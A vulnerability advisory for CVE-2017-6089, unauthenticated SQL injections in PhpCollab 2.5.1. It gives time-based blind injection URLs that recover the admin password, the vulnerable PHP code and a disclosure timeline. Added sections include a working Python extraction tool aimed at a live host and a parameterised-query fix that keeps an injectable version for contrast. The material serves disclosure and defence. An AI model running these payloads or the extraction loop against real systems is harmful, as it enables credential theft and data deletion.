# [CVE-2017-6089] PhpCollab 2.5.1 Multiple SQL Injections (unauthenticated)

## Description

PhpCollab is an open source web-based project management system that enables collaboration across the Internet.

## SQL injections

The phpCollab code does not correctly filter request arguments before using them in SQL statements, allowing arbitrary SQL code execution by an unauthenticated user.

**CVE ID**: CVE-2017-6089

**Access Vector**: remote

**Security Risk**: Critical

**Vulnerability**: CWE-89

**CVSS Base Score**: 10 (Critical)

**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H

## Proof of Concept 1

The following HTTP requests allow an attacker to extract data using time-based SQL injection in either the `project` or the `id` parameter (at least one topic must exist). `0x61646d696e` is the hex encoding of `admin`; the response is delayed by five seconds only when the first character of that account's password is `t` (`CHAR(116)`), so the password can be recovered one character at a time:

```
http://phpCollab.lan/topics/deletetopics.php?project=1'+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))+and+'2'='2
http://phpCollab.lan/topics/deletetopics.php?project=1&id=1+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))
```

### Vulnerable code

The vulnerable code is found in `topics/deletetopics.php`, line 9:

```php
if ($action == "delete") {
    // $id comes straight from the request; "**" is the application's list separator
    $id = str_replace("**",",",$id);
    // $id is interpolated unquoted and unvalidated into both DELETE statements
    $tmpquery1 = "DELETE FROM ".$tableCollab["topics"]." WHERE id = $id";
    $tmpquery2 = "DELETE FROM ".$tableCollab["posts"]." WHERE topic = $id";
    $pieces = explode(",",$id);
    $num = count($pieces);
    connectSql("$tmpquery1");
    connectSql("$tmpquery2");
```

## Proof of Concept 2

The following HTTP request allows an attacker to extract data using SQL injection in the `id` parameter (at least one saved bookmark must exist):

```
http://phpCollab.lan/bookmarks/deletebookmarks.php?action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
```

### Vulnerable code

The vulnerable code is found in `bookmarks/deletebookmarks.php`, line 32:

```php
if ($action == "delete") {
    $id = str_replace("**",",",$id);
    // the whole request value lands inside IN(...), so a subquery is accepted as-is
    $tmpquery1 = "DELETE FROM ".$tableCollab["bookmarks"]." WHERE id IN($id)";
    connectSql("$tmpquery1");
```

## Proof of Concept 3

The following HTTP request allows an attacker to extract data using SQL injection in the `id` parameter (at least one calendar entry must exist):

```
http://phpCollab.lan/calendar/deletecalendar.php?project=&action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
```

### Vulnerable code

The vulnerable code is found in `calendar/deletecalendar.php`, line 31:

```php
if ($action == "delete") {
    $id = str_replace("**",",",$id);
    // same pattern as deletebookmarks.php: unvalidated list spliced into IN(...)
    $tmpquery1 = "DELETE FROM ".$tableCollab["calendar"]." WHERE id IN($id)";
    connectSql("$tmpquery1");
```

**Notes**

The application lacks a consistent defence against injection, so other parameters and pages may be vulnerable. This advisory does not intend to be an exhaustive list of vulnerable parameters.

## Solution

Update to the latest available version.

## Affected versions

* Version <= 2.5.1

## Timeline (dd/mm/yyyy)

* 27/08/2016 : Initial discovery.
* 05/10/2016 : Initial contact.
* 11/10/2016 : GPG key exchange.
* 19/10/2016 : Advisory sent to vendor.
* 13/02/2017 : First fixes.
* 15/02/2017 : Fixes validated by Sysdream.
* 21/02/2017 : PhpCollab asks to wait before publishing.
* 21/06/2017 : New version released.
* 29/09/2017 : Public disclosure.

## Credits

* Nicolas SERRA, Sysdream (n.serra -at- sysdream -dot- com)

--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1

* Website: https://sysdream.com/
* Twitter: @sysdream
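The proofs of concept above each test a single character (`substr(password,1,1) like CHAR(116)`) and signal the result through a five-second `SLEEP`. The following Python is an added example, not part of the Sysdream advisory or of PhpCollab, that generalises that oracle into the loop an attacker (or a tester validating the fix) actually runs: it builds the same `SLEEP` condition for an arbitrary position and candidate character, wraps it in the PoC 1 `id` request shape, and walks the charset until the whole value is recovered. The `members` table, `login`/`password` columns and `0x61646d696e` login literal come from the advisory; the `http_timing_oracle` plumbing, the 4-second threshold and the simulated target are assumptions made here so the code runs offline.

```python
"""Time-based blind extraction loop behind the CVE-2017-6089 PoCs (added example).

Table and column names are those quoted in the advisory; the HTTP oracle and the
simulated target are constructed here and are not PhpCollab code.
"""
import string
import time
import urllib.parse
import urllib.request
from typing import Callable

# One character of the secret per request. '%' and '_' are LIKE wildcards, which
# is why build_sleep_payload compares with '=' instead of the PoC's LIKE.
CHARSET = string.ascii_letters + string.digits + string.punctuation


def to_mysql_hex(s: str) -> str:
    """'admin' -> '0x61646d696e', the hex string literal used in the PoC URLs."""
    return "0x" + s.encode().hex()


def build_sleep_payload(pos: int, char: str, login: str = "admin", delay: int = 5) -> str:
    """MySQL condition that sleeps only when password[pos] == char for `login`.

    Same shape as the PoC (SELECT SLEEP(n) FROM members WHERE login LIKE 0x..
    AND substr(password,pos,1) ...). BINARY forces a case-sensitive comparison
    regardless of the column collation.
    """
    return (
        f"(SELECT SLEEP({delay}) FROM members WHERE login LIKE {to_mysql_hex(login)} "
        f"AND substr(password,{pos},1) = BINARY CHAR({ord(char)}))"
    )


def build_url(base: str, pos: int, char: str) -> str:
    """PoC 1, `id` variant: topics/deletetopics.php?project=1&id=1 and (...)."""
    injected = f"1 and {build_sleep_payload(pos, char)}"
    query = urllib.parse.urlencode({"project": "1", "id": injected})
    return f"{base}/topics/deletetopics.php?{query}"


def http_timing_oracle(base: str, threshold: float = 4.0, timeout: float = 30.0
                       ) -> Callable[[int, str], bool]:
    """Oracle against a live host (assumed base URL): True when the round trip
    took at least `threshold` seconds. Network-dependent, not run by the demo."""
    def oracle(pos: int, char: str) -> bool:
        start = time.monotonic()
        try:
            with urllib.request.urlopen(build_url(base, pos, char), timeout=timeout) as resp:
                resp.read()
        except OSError:
            pass  # HTTP errors or a timeout: the elapsed time is still the signal
        return time.monotonic() - start >= threshold
    return oracle


def extract_secret(oracle: Callable[[int, str], bool], max_len: int = 64,
                   charset: str = CHARSET) -> str:
    """Recover the value position by position; stops at the first position where
    no candidate matches (end of string). Cost: up to len*|charset| requests,
    each paying `delay` seconds on a hit."""
    found = []
    for pos in range(1, max_len + 1):
        for c in charset:
            if oracle(pos, c):
                found.append(c)
                break
        else:
            break  # nothing matched: past the end of the value
    return "".join(found)


def simulated_oracle(secret: str) -> Callable[[int, str], bool]:
    """Constructed stand-in for the SLEEP oracle: answers exactly as the DB would
    for a members row whose password is `secret`."""
    return lambda pos, c: pos <= len(secret) and secret[pos - 1] == c


if __name__ == "__main__":
    # Offline demo with a constructed secret; swap in http_timing_oracle(base)
    # to run the same loop against a real host.
    print(extract_secret(simulated_oracle("t0pS3cret!")))
```

The threshold should stay well below the `SLEEP` delay but above the target's normal latency; a single retry on hits keeps a slow network from producing a wrong character, since a false positive at position `n` corrupts every later position.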
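All three vulnerable pages share one pattern: a `**`-separated list of ids from the request is turned into a comma list and spliced into `WHERE id IN(...)`, which is exactly the case where developers reach for string concatenation because a single bound parameter cannot hold a list. The following Python/sqlite3 code is an added illustration of the defensive pattern, not PhpCollab's actual patch (which is PHP): parse the list into integers first, generate one placeholder per id, and bind the owner of the current session as well, since the advisory's requests are unauthenticated and parameterisation alone does not stop one user deleting another's rows. The `bookmarks` table layout, the `owner` column and the rows are constructed for the demo.

```python
"""Safe handling of a '**'-joined id list in an IN(...) clause (added example).

Illustrative Python/sqlite3, not PhpCollab code; table and rows are constructed.
"""
import re
import sqlite3


def parse_id_list(raw: str) -> list:
    """'1**3**7' -> [1, 3, 7]. Every piece must be a decimal integer, so a value
    such as 'select sleep(5) from members ...' (PoC 2/3) never reaches SQL."""
    if not raw:
        raise ValueError("empty id list")
    ids = []
    for piece in raw.split("**"):
        if not re.fullmatch(r"[0-9]+", piece):
            raise ValueError(f"invalid id: {piece!r}")
        ids.append(int(piece))
    return ids


def delete_bookmarks_vulnerable(conn, raw: str) -> None:
    """Faithful port of the original pattern (str_replace then concatenation),
    kept only for the contrast below. Do not use."""
    id_list = raw.replace("**", ",")
    conn.execute(f"DELETE FROM bookmarks WHERE id IN({id_list})")  # injectable
    conn.commit()


def delete_bookmarks_safe(conn, raw: str, owner: int) -> int:
    """Validated ids, one '?' placeholder per id, and an ownership check bound
    from the session rather than the request. Returns the number of rows deleted.
    Caveat: SQLite caps bound parameters (999 in older builds), so very long
    lists should be chunked or rejected."""
    ids = parse_id_list(raw)
    placeholders = ",".join("?" * len(ids))
    cur = conn.execute(
        f"DELETE FROM bookmarks WHERE owner = ? AND id IN({placeholders})",
        [owner, *ids],
    )
    conn.commit()
    return cur.rowcount


def make_db() -> sqlite3.Connection:
    """Constructed fixture: five bookmarks, all owned by user 1."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE bookmarks (id INTEGER PRIMARY KEY, owner INTEGER, url TEXT)")
    conn.executemany(
        "INSERT INTO bookmarks VALUES (?, ?, ?)",
        [(i, 1, f"http://example.invalid/{i}") for i in range(1, 6)],
    )
    conn.commit()
    return conn


def count_rows(conn) -> int:
    return conn.execute("SELECT COUNT(*) FROM bookmarks").fetchone()[0]


def demo():
    """Same subquery shape as the PoC (a SELECT inside IN) against both versions."""
    attack = "select id from bookmarks"

    vuln = make_db()
    delete_bookmarks_vulnerable(vuln, attack)
    rows_after_attack = count_rows(vuln)          # 0: the subquery matched every row

    safe = make_db()
    try:
        delete_bookmarks_safe(safe, attack, owner=1)
        rejected = False
    except ValueError:
        rejected = True                           # never reaches the database
    deleted_other_owner = delete_bookmarks_safe(safe, "1**3", owner=2)  # 0
    deleted_own = delete_bookmarks_safe(safe, "1**3", owner=1)          # 2
    return rows_after_attack, rejected, deleted_other_owner, deleted_own, count_rows(safe)


if __name__ == "__main__":
    print(demo())
```

The integer check does the heavy lifting for this particular code path because ids are numeric; for string-valued lists the same placeholder expansion applies and the validation step becomes an allow-list or a length/charset check rather than a regex for digits.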